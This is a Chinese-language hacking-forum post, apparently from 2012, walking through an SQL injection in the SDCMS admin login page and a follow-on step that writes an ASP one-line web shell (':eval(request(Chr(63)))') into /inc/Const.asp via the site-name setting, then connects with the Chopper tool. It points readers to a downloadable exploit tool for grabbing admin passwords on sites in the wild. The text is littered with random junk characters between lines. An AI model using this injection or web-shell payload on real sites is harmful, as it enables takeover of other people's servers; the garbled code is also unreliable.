作者:T00LS 鬼哥
8 S8 v! G( }$ s+ ?1 b% E( v8 f5 H7 q漏洞文件:后台目录/index.asp8 ]7 e. s- J( Y( Q+ q! k. X
+ q1 E k0 R; \8 V6 q
Sub Check
* H" @4 R' V. B" \8 E5 N0 l4 C5 O Dim username,password,code,getcode,Rs3 m) I8 o5 V; {0 C* E; Y( U
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub* x: {$ h" R" k9 l
username=FilterText(Trim(Request.Form("username")),1)
7 H: B5 \3 X; Q/ {; `1 u% d( @ password=FilterText(Trim(Request.Form("password")),1)2 L/ `2 S& b. E( p" P4 X- \
code=Trim(Request.Form("yzm"))
% @, d; d! \( R, I getcode=Session("SDCMSCode")" m7 j) P" V) |+ L1 r0 k3 ~
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died/ x1 n3 `: Q) ^. Z0 J. r/ n _+ i/ y
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
Q" ^ {) h3 k Q0 ~& u5 r IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
! T9 H, a- k6 P* n3 _1 g IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied' q" A' H5 z# z6 D
IF username="" or password="" Then: U" S3 r8 Q! X$ h& U0 }& J
Echo "用户名或密码不能为空"ied
) D1 m- H; Y9 `+ |, i1 H Else8 ~; H# f' t& k1 y* \
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")" E. L! u8 o/ Y% s" J2 H
IF Rs.Eof Then& L; k/ V. h1 ]! h/ o# e* q
AddLog username,GetIp,"登录失败",1
1 i0 a5 L! x6 u7 K( F Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"8 l7 L- g9 }, l" d
Else
: G) W, a; h$ n# c) g8 g4 H Add_Cookies "sdcms_id",Rs(0)! i* o$ W; O. l# X" S0 D: {
Add_Cookies "sdcms_name",username
1 e) |- R; D4 ?+ S- x Add_Cookies "sdcms_pwd",Rs(2)* a, i3 I/ ?# c3 J6 F
Add_Cookies "sdcms_admin",Rs(3)1 Y- @" }: |! b- T" f, a0 q; C
Add_Cookies "sdcms_alllever",Rs(4)
6 v: p$ w5 K* C: G' {! ?& Y Add_Cookies "sdcms_infolever",Rs(5)9 n0 Y/ r8 r4 [+ V
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
# |7 [/ H& [6 ~% k* ~5 ]$ ] AddLog username,GetIp,"登录成功",11 S% u. f, X- d7 ?/ q7 P
'自动删除30天前的Log记录
) M& [- u) u* r+ [' A; y& X IF Sdcms_DataType Then
8 t: O% J/ {$ f! q m/ T6 {& } Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
( o( q) F0 R- l2 s9 w, V x Else
0 W# [. q* }( O) a' H( { Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")+ e. o9 X* o5 |' Y9 M
End IF
3 n, a3 Y. I% V7 p% }# i Go("sdcms_index.asp")
5 E1 y0 a3 v! j End IF
" a8 J% g. R% c# z) I5 G0 x9 C+ U1 v Rs.Close0 w' [$ t( K4 @2 S' u1 N' x
Set Rs=Nothing! D3 _+ k" r( o! r9 t; o
End IF
# C. q7 y& m( E; ^" \: XEnd Sub
, O: _+ y5 ^( ^$ }- U. V! G$ ^" ?& K" S; O; b8 K. w
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
, @* e& a5 q( m3 r* v6 b3 }: H# c' j8 b, F0 W- L
Function FilterText(ByVal t0,ByVal t1)
: b2 u) j( ^4 Q# E IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
+ _+ h2 C8 H9 m" z5 x, O* X3 _ t0=Trim(t0)
0 D) L8 d( U% c- u1 A% C9 [+ \ Select Case t1- V! w: s Y# @, m' D( |9 F
Case "1"; Z1 v( N) ?) S* G9 r/ F
t0=Replace(t0,Chr(32),""); l$ L4 j! k. z$ n0 f1 t
t0=Replace(t0,Chr(13),"")5 t _+ W- b- U' S8 H2 H
t0=Replace(t0,Chr(10)&Chr(10),"")
5 ?# Q; K; a( `4 A! Y t0=Replace(t0,Chr(10),"")
3 k' w0 I/ e! |0 `' b+ g Case "2"
2 w' _& x `/ `! L9 W- M t0=Replace(t0,Chr(8),"")'回格
$ `) J" I0 i( V t0=Replace(t0,Chr(9),"")'tab(水平制表符)
( ~/ Y# ?- X9 \% Y& X t0=Replace(t0,Chr(10),"")'换行% m( C7 @1 ?4 B* }, `3 @
t0=Replace(t0,Chr(11),"")'tab(垂直制表符). n8 D3 z7 l" T
t0=Replace(t0,Chr(12),"")'换页4 {. |! _% m5 @* t
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合3 R) R6 o0 s9 t$ m G" r
t0=Replace(t0,Chr(22),"")
( W4 ^2 U9 Y7 s1 n3 } t0=Replace(t0,Chr(32),"")'空格 SPACE" a) W6 m+ j6 X" I
t0=Replace(t0,Chr(33),"")'!# ]" U; _$ @/ \5 U5 g) z: ^
t0=Replace(t0,Chr(34),"")'"
3 w7 M* Y/ u' d t0=Replace(t0,Chr(35),"")'#
2 C" S* q9 f- k; K' i& a' H7 A6 u t0=Replace(t0,Chr(36),"")'$( g0 E" n7 ]2 i3 V
t0=Replace(t0,Chr(37),"")'%
& o x$ ^. G- n$ Y0 r0 z1 C' K t0=Replace(t0,Chr(38),"")'&3 S6 i. l: K: F3 t. ~. M$ C& r
t0=Replace(t0,Chr(39),"")''2 o: S9 F0 p2 H( H
t0=Replace(t0,Chr(40),"")'(! x6 s5 Y) V/ V" A/ H- ?6 ]+ M
t0=Replace(t0,Chr(41),"")')
0 x' b# q' n; a; O" }0 E- ~8 o t0=Replace(t0,Chr(42),"")'*
' H! p2 d, a# c$ d, v. `4 u t0=Replace(t0,Chr(43),"")'+ ~$ B6 N0 U! g+ C
t0=Replace(t0,Chr(44),"")',9 s9 v6 F, ~2 m1 Q, \. k3 R5 S
t0=Replace(t0,Chr(45),"")'-, `9 G- g! x" Q5 Q) j$ P- }
t0=Replace(t0,Chr(46),"")'.
0 D1 X6 N* ?3 ? t0=Replace(t0,Chr(47),"")'/
* d5 N6 [- h7 U: d2 ` t0=Replace(t0,Chr(58),"")':* |7 S# J6 ^! u6 o
t0=Replace(t0,Chr(59),"")';
* O( O% w: ` b t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
4 M4 m5 l- c( \' o t0=Replace(t0,Chr(63),"")'?
8 W* F6 E' m1 h8 m7 P5 l3 i6 u t0=Replace(t0,Chr(64),"")'@7 S2 E8 X( x, H7 O! g
t0=Replace(t0,Chr(91),"")'\* q* E. K* n- m; ~$ j
t0=Replace(t0,Chr(92),"")'\
. X. m E' r: J) m5 `, S" v t0=Replace(t0,Chr(93),"")']
: B4 e8 c4 O9 Q) q& R1 e t0=Replace(t0,Chr(94),"")'^: `) Q& f* c0 A) a# h3 G
t0=Replace(t0,Chr(95),"")'_
- `1 f- H! T+ [; }: w9 G: X( T t0=Replace(t0,Chr(96),"")'`# E" g3 w, ]" M' U) c6 t
t0=Replace(t0,Chr(123),"")'{
( x& J9 `$ F) d, l& l5 d- \ t0=Replace(t0,Chr(124),"")'|
9 D9 G! t4 p& b% h7 J t0=Replace(t0,Chr(125),"")'}
3 S$ P1 p0 Z( p# Z0 N6 m$ p t0=Replace(t0,Chr(126),"")'~" s, A# R3 E, v& Q/ i: A& y
Case Else
, F8 @, G4 A( O+ I$ K; N t0=Replace(t0, "&", "&")
2 i' G0 Z C! ] t0=Replace(t0, "'", "'")
' ~' q3 q' I) F& ] t0=Replace(t0, """", """)
6 B. I' g( l: _$ B, P0 f t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
# H; [6 Z* s/ q9 ^2 B9 L1 f End Select
! M, m7 T8 b1 E2 ^ IF Instr(Lcase(t0),"expression")>0 Then! F/ c) V+ Q: B4 O x& m
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)% P; R# c4 H6 i2 z: Z K
End If; w `2 R4 h% l0 `
FilterText=t0
2 i" s5 U0 W4 c# w: IEnd Function
& n6 h8 Z8 f2 M1 V# b
) s! B' T0 [" G$ K9 @看到没。直接参数是1 只过滤6 ?# U& |7 x1 S/ s
t0=Replace(t0,Chr(32)," ")9 h8 c- F: d4 s0 g$ n; g$ c, O
t0=Replace(t0,Chr(13),""). }* B, _1 Q# G( [3 y
t0=Replace(t0,Chr(10)&Chr(10)," X: \ O+ o3 c" p' I, o. ~+ N
")
% j. d! Q4 A% R0 Q t0=Replace(t0,Chr(10),"
/ {8 j8 ^" `, x0 Q% @"): [" N( k; D/ P+ v# i! h
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
% u5 w1 ^5 O& z$ B& W2 |EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP" v. w- T4 r- k: Z' `0 D
7 T4 g; L* M& E测试:
# q* Y5 g* r4 o* ~% a; G/ t6 s _( H6 k: h
* s# P: q& ?; p p8 f
现在输入工具上验证码,然后点OK6 w+ ^: |9 [( V+ l- V
3 K4 ]" d3 n& w
# }/ z* _/ u0 ~6 x$ b, P看到我们直接进入后台管理界面了,呵呵!
: r" x4 d9 d' i# e: o* P; u! D/ X" T) e
- v. c {( t& G ]- ?' D5 y9 V. r: }9 x; Y! r* P% V
这样直接进入后台了。。。。
5 |# t% r2 V' R' {5 q) n4 e
/ y1 k; y; g* t! I: _$ U- E
) Y+ k( U6 ^) e
6 e( t4 d$ R6 c! q+ eSDCMS提权:
! _: B9 n* c9 Q4 B- Y/ ?: o
, M. l8 C0 A: X方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
1 w3 X& n# p. a; L; N V! I7 w1 q0 N
/ A5 x2 B! u9 g+ S
! K* a/ E$ Y% ~$ aOK,现在用菜刀连接下!
; E% Z& @/ P/ f/ r# g$ ^
, f# ]! f5 {8 p- R* w
: ^9 J3 U( q9 D1 v5 r! g! x2 Y. G+ E- T
) C4 r ?: U% v9 U% }# t) \
4 V1 T: x8 k2 a$ R
|
发表于 2012-11-9 20:57:02
收藏
支持
反对